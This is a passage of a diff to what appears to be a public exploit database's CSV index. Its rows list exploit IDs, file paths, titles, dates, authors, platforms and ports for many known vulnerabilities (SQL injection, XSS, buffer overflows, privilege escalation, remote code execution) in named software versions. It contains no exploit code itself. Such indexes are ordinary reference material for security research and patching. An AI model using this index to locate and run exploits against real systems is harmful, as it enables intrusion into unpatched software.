Vulnerability",2007-01-22,Linux_Drox,php,webapps,0 29508,platforms/php/webapps/29508.sh,"Vote! Pro 4.0 - Multiple PHP Code Execution Vulnerabilities",2007-01-23,r0ut3r,php,webapps,0 29509,platforms/osx/dos/29509.txt,"Apple Mac OS X 10.4.8 - QuickDraw GetSrcBits32ARGB Remote Memory Corruption Vulnerability",2007-01-23,LMH,osx,dos,0 +30029,platforms/php/webapps/30029.txt,"SonicBB 1.0 - Search.PHP Cross-Site Scripting Vulnerability",2007-05-14,"Jesper Jurcenoks",php,webapps,0 +30031,platforms/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,ios,webapps,0 +30032,platforms/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Buffer Overflow/SEH Buffer Overflow/DEP Bypass with ROP",2013-12-04,metacom,windows,local,0 +30085,platforms/linux/webapps/30085.txt,"Zimbra - Privilegie Escalation via LFI (0day)",2013-12-06,rubina119,linux,webapps,0 +30035,platforms/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injection Vulnerabilities",2007-05-14,"Jesper Jurcenoks",php,webapps,0 +30036,platforms/php/webapps/30036.html,"WordPress 2.1.3 Akismet Plugin Unspecified Vulnerability",2007-05-14,"David Kierznowski",php,webapps,0 +30037,platforms/windows/remote/30037.txt,"Caucho Resin 3.1 Encoded Space (%20) Request Path Disclosure",2007-05-15,"Derek Abdine",windows,remote,0 +30038,platforms/windows/remote/30038.txt,"Caucho Resin 3.1 \web-inf Traversal Arbitrary File Access",2007-05-15,"Derek Abdine",windows,remote,0 +30039,platforms/multiple/local/30039.txt,"Multiple Personal Firewall Products - Local Protection Mechanism Bypass Vulnerability",2007-05-15,"Matousec Transparent security",multiple,local,0 +30040,platforms/php/webapps/30040.txt,"Jetbox CMS 2.1 Email FormMail.PHP Input Validation Vulnerability",2007-05-15,"Jesper Jurcenoks",php,webapps,0 +30041,platforms/php/webapps/30041.txt,"Jetbox CMS 2.1 - view/search/ path Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0 +30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0 +30043,platforms/linux/remote/30043.txt,"Sun Java JDK 1.x - Multiple Vulnerabilities",2007-05-16,"Chris Evans",linux,remote,0 +30045,platforms/windows/remote/30045.html,"PrecisionID Barcode PrecisionID_Barcode.DLL ActiveX 1.9 Control Arbitrary File Overwrite Vulnerability",2007-05-16,shinnai,windows,remote,0 +30046,platforms/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup <= 11.5 mediasvr caloggerd Denial of Service Vulnerabilities",2007-05-16,"M. Shirk",windows,dos,0 +30047,platforms/php/webapps/30047.txt,"VBulletin <= 3.6.6 Calendar.PHP HTML Injection Vulnerability",2007-05-16,"laurent gaffie",php,webapps,0 +30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 ShopContent.ASP Cross-Site Scripting Vulnerability",2007-05-17,"John Martinelli",asp,webapps,0 +30049,platforms/windows/remote/30049.html,"LEADTOOLS Multimedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow Vulnerability",2007-05-17,shinnai,windows,remote,0 +30050,platforms/php/webapps/30050.html,"Redoable 1.2 Theme header.php s Parameter XSS",2007-05-17,"John Martinelli",php,webapps,0 +30051,platforms/php/webapps/30051.txt,"PsychoStats <= 2.3 - Server.PHP Path Disclosure Vulnerability",2007-05-17,kefka,php,webapps,0 +30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0 +30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0 +30054,platforms/jsp/webapps/30054.txt,"Sonicwall Gms 7.x - Filter Bypass & Persistent Vulnerability (0Day)",2013-12-05,Vulnerability-Lab,jsp,webapps,0 +30055,platforms/ios/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,ios,webapps,0 +30201,platforms/php/webapps/30201.txt,"Fuzzylime 1.0 Low.PHP Cross-Site Scripting Vulnerability",2007-06-18,RMx,php,webapps,0 +30156,platforms/cgi/webapps/30156.txt,"CGILua <= 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",cgi,webapps,0 +30200,platforms/php/webapps/30200.txt,"PHP Hosting Biller 1.0 Index.PHP Cross-Site Scripting Vulnerability",2007-08-18,Serapis.net,php,webapps,0 +30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 Lang Cookie Parameter Local File Include Vulnerability",2007-05-08,netVigilance,php,webapps,0 +30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp Frameset-7.HTML Cross-Site Scripting Vulnerability",2007-05-08,"Michael Domberg",windows,remote,0 +30017,platforms/unix/local/30017.sh,"HP Tru64 5.0.1 DOP Command Local Privilege Escalation Vulnerability",2007-05-08,"Daniele Calore",unix,local,0 +30018,platforms/linux/remote/30018.py,"Python 2.5 PyLocale_strxfrm Function Remote Information Leak Vulnerability",2007-05-08,"Piotr Engelking",linux,remote,0 +30019,platforms/windows/remote/30019.c,"CA Multiple Products Console Server and InoCore.dll - Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0 +30020,platforms/linux/dos/30020.txt,"MySQL 5.0.x - IF Query Handling Remote Denial of Service Vulnerability",2013-12-04,"Neil Kettle",linux,dos,0 +30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure Vulnerability",2007-05-10,anonymous,solaris,local,0 +30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 Configure_Plugin.TPL.PHP Cross-Site Scripting Vulnerability",2007-05-10,the_Edit0r,php,webapps,0 +30023,platforms/windows/dos/30023.txt,"Progress OpenEdge 10 b - Multiple Denial of Service Vulnerabilities",2007-05-11,"Eelko Neven",windows,dos,0 +30024,platforms/linux/dos/30024.txt,"LibEXIF 0.6.x - Exif_Data_Load_Data_Entry Remote Integer Overflow Vulnerability",2007-05-11,"Victor Stinner",linux,dos,0 +30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0 +30026,platforms/windows/remote/30026.txt,"TFTP Server TFTPDWin 0.4.2 - Unspecified Directory Traversal Vulnerability",2007-05-11,"Digital Defense",windows,remote,0 +30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 Web Mail HTML Injection Vulnerability",2007-05-12,"Alla Bezroutchko",php,webapps,0 +30028,platforms/php/webapps/30028.txt,"EQDKP <= 1.3.1 Show Variable Cross-Site Scripting Vulnerability",2007-05-12,kefka,php,webapps,0 +30014,platforms/windows/local/30014.py,"Windows NDPROXY - Local SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,windows,local,0 29512,platforms/php/webapps/29512.txt,"Vanilla Forums 2.0 - 2.0.18.5 (class.utilitycontroller.php) - PHP Object Injection Vulnerability",2013-11-08,EgiX,php,webapps,80 -29513,platforms/linux/remote/29513.rb,"VICIdial Manager Send OS Command Injection",2013-11-08,metasploit,linux,remote,80 29514,platforms/php/webapps/29514.txt,"appRain 3.0.2 - Blind SQL Injection Vulnerability",2013-11-08,"High-Tech Bridge SA",php,webapps,80 29515,platforms/php/webapps/29515.pl,"Flatpress 1.0 - Remote Code Execution",2013-11-08,Wireghoul,php,webapps,80 29516,platforms/hardware/webapps/29516.txt,"Vivotek IP Cameras - RTSP Authentication Bypass",2013-11-08,"Core Security",hardware,webapps,0 -29517,platforms/php/webapps/29517.txt,"Project'Or RIA 3.4.0 (objectDetail.php, objectId param) - SQL Injection",2013-11-08,"Vicente Aguilera Diaz",php,webapps,80 +29517,platforms/php/webapps/29517.txt,"Project'Or RIA 3.4.0 (objectDetail.php objectId param) - SQL Injection",2013-11-08,"Vicente Aguilera Diaz",php,webapps,80 29518,platforms/hardware/webapps/29518.txt,"Sagemcom F@st 3184 2.1.11 - Multiple Vulnerabilities",2013-11-08,"Oz Elisyan",hardware,webapps,80 29519,platforms/php/webapps/29519.txt,"Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability",2013-11-08,"Marcela Benetrix",php,webapps,80 29520,platforms/linux/dos/29520.txt,"GTK2 GDKPixBufLoader - Remote Denial of Service Vulnerability",2007-01-24,"Lubomir Kundrak",linux,dos,0 @@ -26473,6 +26565,7 @@ id,file,description,date,author,platform,type,port 29523,platforms/osx/dos/29523.txt,"Apple 10.4.x Software Update Format String Vulnerability",2007-01-25,kf,osx,dos,0 29524,platforms/windows/remote/29524.txt,"Microsoft Word 2000 - Malformed Function Code Execution Vulnerability",2007-01-25,Symantec,windows,remote,0 29525,platforms/php/webapps/29525.txt,"Wordpress Highlight Premium Theme - CSRF File Upload Vulnerability",2013-11-10,DevilScreaM,php,webapps,0 +29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0 29527,platforms/linux/remote/29527.pl,"Xine 0.99.4 M3U Remote Format String Vulnerability",2007-01-03,"Kevin Finisterre",linux,remote,0 29528,platforms/php/local/29528.txt,"PHP 5.2 FOpen Safe_Mode Restriction-Bypass Vulnerability",2007-01-26,"Maksymilian Arciemowicz",php,local,0 29529,platforms/php/webapps/29529.txt,"PHP Membership Manager 1.5 Admin.PHP Cross-Site Scripting Vulnerability",2007-01-26,Doz,php,webapps,0 @@ -26487,12 +26580,24 @@ id,file,description,date,author,platform,type,port 29538,platforms/windows/remote/29538.c,"SSC DiskAccess NFS Client DAPCNFSD.DLL Stack Buffer Overflow Vulnerability",2007-01-29,"Andres Tarasco Acuna",windows,remote,0 29539,platforms/php/webapps/29539.txt,"EncapsCMS 0.3.6 - 'common_foot.php' Remote File Include Vulnerability",2007-01-30,Tr_ZiNDaN,php,webapps,0 29540,platforms/solaris/dos/29540.c,"Sun Solaris 10 ICMP Unspecified Remote Denial of Service Vulnerability",2007-01-30,kcope,solaris,dos,0 +29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 setup.php PATH_INFO Parameter XSS",2007-02-26,R00t[ATI],php,webapps,0 +29678,platforms/php/webapps/29678.txt,"Audins Audiens 3.3 system/index.php Cookie PHPSESSID Parameter SQL Injection",2007-02-26,R00t[ATI],php,webapps,0 +29679,platforms/php/webapps/29679.html,"PHPBB2 Admin_Ug_Auth.PHP Administrative Security Bypass Vulnerability",2007-02-26,"Hasadya Raed",php,webapps,0 +29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 Main.PHP Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0 +29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 index.PHP Local File Include Vulnerability",2007-02-26,"D. Matscheko",php,webapps,0 +29682,platforms/php/webapps/29682.txt,"Wordpress 2.1.1 Post.PHP Cross-Site Scripting Vulnerability",2007-02-26,Samenspender,php,webapps,0 +29683,platforms/linux/local/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service Vulnerability",2007-02-27,"Steve Grubb",linux,local,0 +29684,platforms/php/webapps/29684.txt,"Wordpress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-02-27,"Stefan Friedli",php,webapps,0 +29685,platforms/windows/remote/29685.txt,"Nullsoft Shoutcast 1.9.7 Logfile HTML Injection Vulnerability",2007-02-27,SaMuschie,windows,remote,0 +29686,platforms/windows/remote/29686.txt,"Adobe Acrobat/Adobe Reader <= 7.0.9 - Information Disclosure Vulnerability",2007-02-28,pdp,windows,remote,0 +29687,platforms/windows/remote/29687.py,"HyperBook Guestbook 1.3 GBConfiguration.DAT Hashed Password Information Disclosure Vulnerability",2007-02-28,PeTrO,windows,remote,0 29544,platforms/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation Vulnerability",2013-11-12,"Sense of Security",php,webapps,0 29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (DoS)",2013-11-12,"Necmettin COSKUN",windows,dos,0 29546,platforms/windows/dos/29546.rb,"Provj 5.1.5.8 - 'm3u' Buffer Overflow (PoC)",2013-11-12,"Necmettin COSKUN",windows,dos,0 -29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0 29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0 29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - (.m3u) Local Buffer Overflow (SEH/Unicode)",2013-11-12,"Mike Czumak",windows,local,0 +29811,platforms/jsp/webapps/29811.txt,"Atlassian JIRA 3.4.2 IssueNavigator.JSPA Cross-Site Scripting Vulnerability",2007-04-02,syniack,jsp,webapps,0 +29812,platforms/windows/remote/29812.rb,"DesktopCentral AgentLogUpload Arbitrary File Upload",2013-11-25,metasploit,windows,remote,8020 29551,platforms/osx/dos/29551.txt,"Apple Mac OS X 10.4.x iMovie HD .imovieproj Filename Format String",2007-01-30,LMH,osx,dos,0 29552,platforms/windows/remote/29552.rb,"Symantec Altiris DS SQL Injection",2013-11-13,metasploit,windows,remote,402 29553,platforms/osx/dos/29553.txt,"Apple Mac OS X 10.4.x Help Viewer .help Filename Format String",2007-01-30,LMH,osx,dos,0 @@ -26549,6 +26654,7 @@ id,file,description,date,author,platform,type,port 29604,platforms/php/webapps/29604.txt,"ibProArcade 2.5.9+ Arcade.PHP SQL Injection Vulnerability",2007-02-15,sp00k,php,webapps,0 29605,platforms/php/webapps/29605.txt,"Deskpro 1.1 Faq.PHP Cross-Site Scripting Vulnerability",2007-02-15,"BLacK ZeRo",php,webapps,0 29606,platforms/php/webapps/29606.txt,"Calendar Express Search.PHP Cross-Site Scripting Vulnerability",2007-02-15,BL4CK,php,webapps,0 +29676,platforms/php/webapps/29676.txt,"Audins Audiens 3.3 unistall.php Authentication Bypass",2007-02-26,R00t[ATI],php,webapps,0 29607,platforms/windows/dos/29607.html,"EasyMail Objects 6.x Connect Method Remote Stack Buffer Overflow Vulnerability",2007-02-02,"Paul Craig",windows,dos,0 29608,platforms/php/webapps/29608.txt,"CedStat 1.31 index.php hier Parameter XSS",2007-02-16,sn0oPy,php,webapps,0 29609,platforms/php/webapps/29609.txt,"Meganoide's News 1.1.1 Include.PHP Remote File Include Vulnerability",2007-02-16,KaRTaL,php,webapps,0 @@ -26596,6 +26702,9 @@ id,file,description,date,author,platform,type,port 29651,platforms/php/webapps/29651.txt,"Active Calendar 1.2 data/y_2.php css Parameter XSS",2007-02-24,"Simon Bonnard",php,webapps,0 29652,platforms/php/webapps/29652.txt,"Active Calendar 1.2 data/y_3.php css Parameter XSS",2007-02-24,"Simon Bonnard",php,webapps,0 29653,platforms/php/webapps/29653.txt,"Active Calendar 1.2 data/mysqlevents.php css Parameter XSS",2007-02-24,"Simon Bonnard",php,webapps,0 +29671,platforms/windows/dos/29671.txt,"Avira Secure Backup 1.0.0.1 Build 3616 - (.reg) Buffer Overflow",2013-11-18,"Julien Ahrens",windows,dos,0 +29790,platforms/php/webapps/29790.JPG,"ImpressPages CMS 3.8 - Stored XSS Vulnerability",2013-11-23,sajith,php,webapps,0 +29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - Crash PoC (.wav)",2013-11-23,"Akin Tosunlar",windows,dos,0 29658,platforms/php/webapps/29658.txt,"PhotoStand 1.2 Index.PHP Cross-Site Scripting Vulnerability",2007-02-24,"Simon Bonnard",php,webapps,0 29659,platforms/windows/dos/29659.pl,"Microsoft Windows XP/2003 Explorer WMF File Handling Denial of Service Vulnerability",2007-02-25,sehato,windows,dos,0 29660,platforms/windows/dos/29660.txt,"Microsoft Office 2003 - Denial of Service (DoS) Vulnerability",2007-02-25,sehato,windows,dos,0 @@ -26609,23 +26718,18 @@ id,file,description,date,author,platform,type,port 29668,platforms/php/webapps/29668.txt,"Wordpress Dimension Theme - CSRF Vulnerability",2013-11-18,DevilScreaM,php,webapps,80 29669,platforms/php/webapps/29669.txt,"Wordpress Amplus Theme - CSRF Vulnerability",2013-11-18,DevilScreaM,php,webapps,80 29670,platforms/php/webapps/29670.txt,"Wordpress Make A Statement (MaS) Theme - CSRF Vulnerability",2013-11-18,DevilScreaM,php,webapps,80 -29671,platforms/windows/dos/29671.txt,"Avira Secure Backup 1.0.0.1 Build 3616 - (.reg) Buffer Overflow",2013-11-18,"Julien Ahrens",windows,dos,0 +30367,platforms/php/webapps/30367.txt,"AlstraSoft Sms Text Messaging Enterprise 2.0 admin/membersearch.php Multiple Parameter XSS",2007-07-23,Lostmon,php,webapps,0 +30187,platforms/multiple/dos/30187.txt,"Mbedthis AppWeb 2.2.2 URL Protocol Format String Vulnerability",2007-06-12,"Nir Rachmel",multiple,dos,0 +30188,platforms/windows/dos/30188.txt,"Apple Safari Feed URI Denial of Service Vulnerability",2007-05-13,"Moshe Ben-Abu",windows,dos,0 +30189,platforms/jsp/webapps/30189.txt,"Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross-Site Scripting Vulnerability",2007-06-14,anonymous,jsp,webapps,0 +30190,platforms/php/webapps/30190.txt,"Joomla! Letterman Subscriber Module 1.2.4 Mod_Lettermansubscribe.PHP Cross-Site Scripting Vulnerability",2007-06-14,"Edi Strosar",php,webapps,0 +30191,platforms/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross-Site Scripting Vulnerability",2007-06-14,"Rajat Swarup",jsp,webapps,0 +30192,platforms/windows/local/30192.txt,"Kaspersky Internet Security 6.0 - SSDT Hooks Multiple Local Vulnerabilities",2007-06-15,"Matousec Transparent security",windows,local,0 29672,platforms/php/webapps/29672.txt,"LiveZilla 5.0.1.4 - Remote Code Execution",2013-11-18,"Curesec Research Team",php,webapps,80 29673,platforms/hardware/webapps/29673.txt,"Dahua DVR 2.608.0000.0 and 2.608.GV00.0 - Authentication Bypass",2013-11-18,"Jake Reynolds",hardware,webapps,37777 29674,platforms/jsp/webapps/29674.txt,"ManageEngine DesktopCentral 8.0.0 build < 80293 - Arbitrary File Upload Vulnerability",2013-11-18,Security-Assessment.com,jsp,webapps,0 29675,platforms/asp/webapps/29675.txt,"Kaseya < 6.3.0.2 - Arbitrary File Upload Vulnerability",2013-11-18,Security-Assessment.com,asp,webapps,0 -29676,platforms/php/webapps/29676.txt,"Audins Audiens 3.3 unistall.php Authentication Bypass",2007-02-26,R00t[ATI],php,webapps,0 -29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 setup.php PATH_INFO Parameter XSS",2007-02-26,R00t[ATI],php,webapps,0 -29678,platforms/php/webapps/29678.txt,"Audins Audiens 3.3 system/index.php Cookie PHPSESSID Parameter SQL Injection",2007-02-26,R00t[ATI],php,webapps,0 -29679,platforms/php/webapps/29679.html,"PHPBB2 Admin_Ug_Auth.PHP Administrative Security Bypass Vulnerability",2007-02-26,"Hasadya Raed",php,webapps,0 -29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 Main.PHP Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0 -29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 index.PHP Local File Include Vulnerability",2007-02-26,"D. Matscheko",php,webapps,0 -29682,platforms/php/webapps/29682.txt,"Wordpress 2.1.1 Post.PHP Cross-Site Scripting Vulnerability",2007-02-26,Samenspender,php,webapps,0 -29683,platforms/linux/local/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service Vulnerability",2007-02-27,"Steve Grubb",linux,local,0 -29684,platforms/php/webapps/29684.txt,"Wordpress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-02-27,"Stefan Friedli",php,webapps,0 -29685,platforms/windows/remote/29685.txt,"Nullsoft Shoutcast 1.9.7 Logfile HTML Injection Vulnerability",2007-02-27,SaMuschie,windows,remote,0 -29686,platforms/windows/remote/29686.txt,"Adobe Acrobat/Adobe Reader <= 7.0.9 - Information Disclosure Vulnerability",2007-02-28,pdp,windows,remote,0 -29687,platforms/windows/remote/29687.py,"HyperBook Guestbook 1.3 GBConfiguration.DAT Hashed Password Information Disclosure Vulnerability",2007-02-28,PeTrO,windows,remote,0 +29789,platforms/php/webapps/29789.txt,"LimeSurvey 2.00+ (build 131107) - Multiple Vulnerabilities",2013-11-23,LiquidWorm,php,webapps,0 29688,platforms/windows/remote/29688.txt,"EmbeddedWB Web Browser ActiveX Control - Remote Code Execution Vulnerability",2007-02-28,shinnai,windows,remote,0 29689,platforms/linux/remote/29689.py,"GnuPG 1.x Signed Message Arbitrary Content Injection Weakness",2007-03-05,"Gerardo Richarte",linux,remote,0 29690,platforms/linux/remote/29690.py,"KMail 1.x GnuPG Arbitrary Content Injection Vulnerability",2007-03-05,"Gerardo Richarte",linux,remote,0 @@ -26647,12 +26751,17 @@ id,file,description,date,author,platform,type,port 29706,platforms/linux/remote/29706.txt,"DeepOfix SMTP Server 3.3 - Authentication Bypass",2013-11-19,"Gerardo Vazquez, Eduardo Arriols",linux,remote,0 29707,platforms/windows/dos/29707.txt,"JPEGView 1.0.29 - Crash PoC",2013-11-19,"Debasish Mandal",windows,dos,0 29709,platforms/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,hardware,webapps,80 +30368,platforms/php/webapps/30368.txt,"AlstraSoft Sms Text Messaging Enterprise 2.0 admin/edituser.php userid Parameter XSS",2007-07-23,Lostmon,php,webapps,0 +30369,platforms/php/webapps/30369.txt,"AlstraSoft Affiliate Network Pro 8.0 merchants/index.php Multiple Parameter XSS",2007-07-23,Lostmon,php,webapps,0 +30370,platforms/php/webapps/30370.txt,"AlstraSoft Affiliate Network Pro 8.0 merchants/temp.php rowid Parameter XSS",2007-07-23,Lostmon,php,webapps,0 +30371,platforms/php/webapps/30371.txt,"AlstraSoft Affiliate Network Pro 8.0 merchants/index.php uploadProducts Action pgmid Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0 29712,platforms/php/local/29712.txt,"Zend Platform 2.2.1 PHP.INI File Modification Vulnerability",2007-03-03,"Stefan Esser",php,local,0 29713,platforms/linux/dos/29713.html,"KDE Konqueror 3.5 JavaScript IFrame Denial of Service Vulnerability",2007-03-05,mark,linux,dos,0 29714,platforms/linux/local/29714.txt,"Linux Kernel 2.6.17 - Sys_Tee Local Privilege Escalation Vulnerability",2007-03-05,"Michael Kerrisk",linux,local,0 29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 Client Side Input Validation Vulnerability",2007-03-05,"Stefan Friedli",php,webapps,0 29716,platforms/linux/dos/29716.txt,"Silc Server 1.0.2 New Channel Remote Denial of Service Vulnerability",2007-03-06,"Frank Benkstein",linux,dos,0 29717,platforms/linux/dos/29717.txt,"radscan conquest 8.2 - Multiple Vulnerabilities",2007-03-07,"Luigi Auriemma",linux,dos,0 +29798,platforms/windows/local/29798.pl,"ALLPlayer 5.7 - (.m3u) SEH Buffer Overflow (Unicode)",2013-11-24,"Mike Czumak",windows,local,0 29720,platforms/linux/dos/29720.txt,"Mozilla Firefox 2.0.0.2 Document.Cookie Path Argument Denial of Service Vulnerability",2007-03-08,"Nicolas DEROUET",linux,dos,0 29721,platforms/windows/dos/29721.pl,"Fish Multiple Remote Buffer Overflow Vulnerabilities",2007-03-08,"ilja van sprundel",windows,dos,0 29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 CreateURL.PHP Remote File Include Vulnerability",2007-03-09,"Hasadya Raed",php,webapps,0 @@ -26667,7 +26776,7 @@ id,file,description,date,author,platform,type,port 29731,platforms/php/webapps/29731.txt,"SoftNews 4.1/5.5 engine/Ajax/editnews.php root_dir Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29732,platforms/php/remote/29732.php,"PHP 5.2 EXT/Filter Function Remote Buffer Overflow Vulnerability",2007-03-12,"Stefan Esser",php,remote,0 29733,platforms/php/webapps/29733.txt,"PHP-Nuke 8.2.4 - Multiple Vulnerabilities",2013-11-20,"Sojobo dev team",php,webapps,80 -29734,platforms/linux/remote/29734.txt,"PineApp MailSecure - Remote Command Execution",2013-11-20,"Ruben Garrote Garca",linux,remote,7443 +29734,platforms/linux/remote/29734.txt,"PineApp MailSecure - Remote Command Execution",2013-11-20,"Ruben Garrote García",linux,remote,7443 29735,platforms/hardware/remote/29735.rb,"D-Link TFTP 1.0 - Transporting Mode Remote Buffer Overflow Vulnerability",2007-03-12,LSO,hardware,remote,0 29736,platforms/php/webapps/29736.txt,"ClipShare 1.5.3 ADODB-Connection.Inc.PHP Remote File Include Vulnerability",2007-03-12,"RaeD Hasadya",php,webapps,0 29737,platforms/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 Check_Vote.PHP Local File Include Vulnerability",2007-03-13,"BorN To K!LL",php,webapps,0 @@ -26694,7 +26803,7 @@ id,file,description,date,author,platform,type,port 29758,platforms/php/webapps/29758.txt,"PHPX 3.5.15/3.5.16 users.php user_id Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29759,platforms/php/webapps/29759.php,"PHPX 3.5.15/3.5.16 news.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29760,platforms/php/webapps/29760.txt,"PHPX 3.5.15/3.5.16 gallery.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 -29761,platforms/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1,SQL-Ledger 2.6.x Login Parameter Local File Include And Authentication Bypass Vulnerabilities",2007-03-19,"Chris Travers",cgi,webapps,0 +29761,platforms/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1_SQL-Ledger 2.6.x Login Parameter Local File Include And Authentication Bypass Vulnerabilities",2007-03-19,"Chris Travers",cgi,webapps,0 29762,platforms/php/webapps/29762.txt,"Web Wiz Forums 8.05 String Filtering SQL Injection Vulnerability",2007-03-20,"Ivan Fratric",php,webapps,0 29763,platforms/php/webapps/29763.php,"W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities",2007-03-20,"laurent gaffie",php,webapps,0 29764,platforms/php/webapps/29764.txt,"W-Agora 4.2.1 profile.php showuser Parameter XSS",2007-03-20,"laurent gaffie",php,webapps,0 @@ -26720,14 +26829,79 @@ id,file,description,date,author,platform,type,port 29786,platforms/php/webapps/29786.txt,"aBitWhizzy whizzylink.php d Variable Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,webapps,0 29787,platforms/windows/dos/29787.py,"HP Jetdirect FTP Print Server RERT Command Denial of Service Vulnerability",2007-01-18,Handrix,windows,dos,0 29788,platforms/php/remote/29788.php,"PHP <= 4.4.4 Zip_Entry_Read() Integer Overflow Vulnerability",2007-03-27,"Stefan Esser",php,remote,0 -29789,platforms/php/webapps/29789.txt,"LimeSurvey 2.00+ (build 131107) - Multiple Vulnerabilities",2013-11-23,LiquidWorm,php,webapps,0 -29790,platforms/php/webapps/29790.JPG,"ImpressPages CMS 3.8 - Stored XSS Vulnerability",2013-11-23,sajith,php,webapps,0 -29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - Crash PoC (.wav)",2013-11-23,"Akin Tosunlar",windows,dos,0 -29794,platforms/hardware/webapps/29794.txt,"Pirelli Discus DRG A125g - Remote Change SSID Value Vulnerability",2013-11-24,"Sebastin Magof",hardware,webapps,0 -29795,platforms/hardware/webapps/29795.pl,"Pirelli Discus DRG A125g - Local Password Disclosure Vulnerability",2013-11-24,"Sebastin Magof",hardware,webapps,0 -29796,platforms/hardware/webapps/29796.pl,"Pirelli Discus DRG A125g - Remote Change WiFi Password Vulnerability",2013-11-24,"Sebastin Magof",hardware,webapps,0 +30783,platforms/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow Exploit",2014-01-07,Mr.XHat,windows,local,0 +30105,platforms/php/webapps/30105.txt,"Wordpress Download Manager Free & Pro 2.5.8 - Persistent Cross-Site Scripting",2013-12-08,"Jeroen - IT Nerdbox",php,webapps,0 +30157,platforms/php/webapps/30157.txt,"Joomla JD-Wiki 1.0.2 dwpage.php mosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 +30158,platforms/php/webapps/30158.txt,"Joomla JD-Wiki 1.0.2 wantedpages.php mosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 +30107,platforms/php/webapps/30107.txt,"Ovidentia 7.9.6 - Multiple Vulnerabilities",2013-12-08,sajith,php,webapps,0 +30109,platforms/php/webapps/30109.txt,"Particle Gallery 1.0 - Search.PHP Cross-Site Scripting Vulnerability",2007-05-30,Serapis.net,php,webapps,0 +30110,platforms/linux/dos/30110.c,"Bochs 2.3 - Buffer Overflow and Denial of Service Vulnerabilities",2007-05-31,"Tavis Ormandy",linux,dos,0 +30111,platforms/php/webapps/30111.txt,"MyBloggie 2.1.x Index.PHP Multiple SQL Injection Vulnerabilities",2007-05-31,ls@calima.serapis.net,php,webapps,0 +30112,platforms/php/webapps/30112.txt,"PHP JackKnife 2.21 (PHPJK) G_Display.php iCategoryUnq Parameter SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 +30113,platforms/php/webapps/30113.txt,"PHP JackKnife 